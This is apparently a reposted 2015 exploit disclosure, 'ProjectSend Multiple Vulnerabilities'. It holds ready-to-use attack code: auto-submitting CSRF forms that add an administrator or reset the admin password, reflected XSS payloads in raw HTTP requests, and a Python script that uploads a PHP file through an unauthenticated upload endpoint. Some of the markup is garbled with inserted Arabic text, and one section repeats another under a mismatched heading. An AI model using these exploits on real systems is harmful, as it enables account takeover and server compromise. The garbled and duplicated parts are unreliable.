• 13 June 2015

    #[+] Author: TUNISIAN CYBER
    #[+] Title: ProjectSend Multiple Vulnerabilities
    #[+] Date: 25-04-2015
    #[+] Vendor: http://www.projectsend.org/
    #[+] Download:http://www.projectsend.org/download/67/
    #[+] Type: WebAPP
    #[+] Tested on: KaliLinux (Debian)
    #[+] Twitter: @TCYB3R

    It's a long one so let's start...

    I/ CSRF: Add Admin

    <html>
    <head>
    <title>ProjectSend CSRF (Add User)</title>
    </head>
    <body>
        <form action="http://192.168.186.129/ProjectSend-r561/users-add.php" method="POST" id="CSRF" style="visibility:hidden">
          <input type="hidden" name="add_user_form_name" value="CSRF OPS" />
          <input type="hidden" name="add_user_form_user" value="TUNISIANCYBER" />
          <input type="hidden" name="add_user_form_pass" value="password" />
          <input type="hidden" name="add_user_form_email" value="pwn3d@csrf.com" />
          <input type="hidden" name="add_user_form_level" value="9" />
          <input type="hidden" name="add_user_form_active" checked="checked" />
        </form>
    <استبدال script>
    استبدال document.getElementById("CSRF").submit();
    </استبدال script>
      </body>
    </html>

    0x0Proof:
    http://i.imgur.com/t77Plve.png

    II/ CSRF: Change Admin Password:
    <html>
    <head>
    <title>ProjectSend CSRF (Change Password)</title>
    </head>
    <body>
        <form action="http://192.168.186.129/ProjectSend-r561/users-edit.php?id=1" method="POST" id="CSRF" style="visibility:hidden">
          <input type="hidden" name="add_user_form_name" value="User changed" />
          <input type="hidden" name="add_user_form_user" value="admin" />
          <input type="hidden" name="add_user_form_pass" value="password" />
          <input type="hidden" name="add_user_form_email" value="newemail@opss.net" />
          <input type="hidden" name="add_user_form_level" value="9" />
          <input type="hidden" name="add_user_form_active" checked="checked" />
        </form>
    <استبدال script>
    استبدال document.getElementById("CSRF").submit();
    </استبدال script>
      </body>
    </html>

    III/ XSS_1 (index.php):
    Host: 192.168.186.129
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 78

    0x0Proof:
    http://i.imgur.com/TDfFDU3.png

    IV/ XSS_2 (clients.php):
    http://192.168.186.129/ProjectSend-r561/clients.php

    POST /ProjectSend-r561/clients.php HTTP/1.1
    Host: 192.168.186.129
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 64
    search=%22%3E%3Cاستبدال script%3Ealert%28%220000%22%29%3B%3C%2Fاستبدال script%3E
    HTTP/1.1 200 OK
    Date: Sat, 25 Apr 2015 21:15:13 GMT
    Server: Apache/2.2.22 (Debian)
    X-Powered-By: PHP/5.4.39-0+deb7u2
    Expires: Sat, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0
    Pragma: no-cache
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 2851
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html

    0x0Proof:
    http://i.imgur.com/ywf8JdF.png

    V/XSS_3 (actions-log.php)
    http://192.168.186.129/ProjectSend-r561/clients.php

    POST /ProjectSend-r561/clients.php HTTP/1.1
    Host: 192.168.186.129
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 64
    search=%22%3E%3Cاستبدال script%3Ealert%28%220000%22%29%3B%3C%2Fاستبدال script%3E
    HTTP/1.1 200 OK
    Date: Sat, 25 Apr 2015 21:15:13 GMT
    Server: Apache/2.2.22 (Debian)
    X-Powered-By: PHP/5.4.39-0+deb7u2
    Expires: Sat, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0
    Pragma: no-cache
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 2851
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html

    0x0Proof:
    http://i.imgur.com/cVKIhj3.png

    VI/ File Upload:
    (Exploit oirignally found by Fady Mohamed Osman )

    Rewrittend by TUNISIAN CYBER

    #!/usr/bin/env python
    import requests
    print"+---------------------------------------+"
    print"| ProjectSend File Upload Vulnerability |"
    print"+---------------------------------------+"

    vuln = raw_input('Vulnerable Site:')
    fname = raw_input('EvilFile:')
    with open(fname, 'w') as fout:
        fout.write("<?php phpinfo() ?>")
    url = vuln +'/process-upload.php' +'?name=' + fname
    files = {'file': open(fname, 'rb')}
    result = requests.post(url, files=files)
    print "===>" +vuln+"/upload/files/"+fname




    Sumber : http://www.sec4ever.com

    0 comments

  • Nisekoi Template Designed by Johanes Djogan

    ©2016 - ReDesigned By Ani-Sudo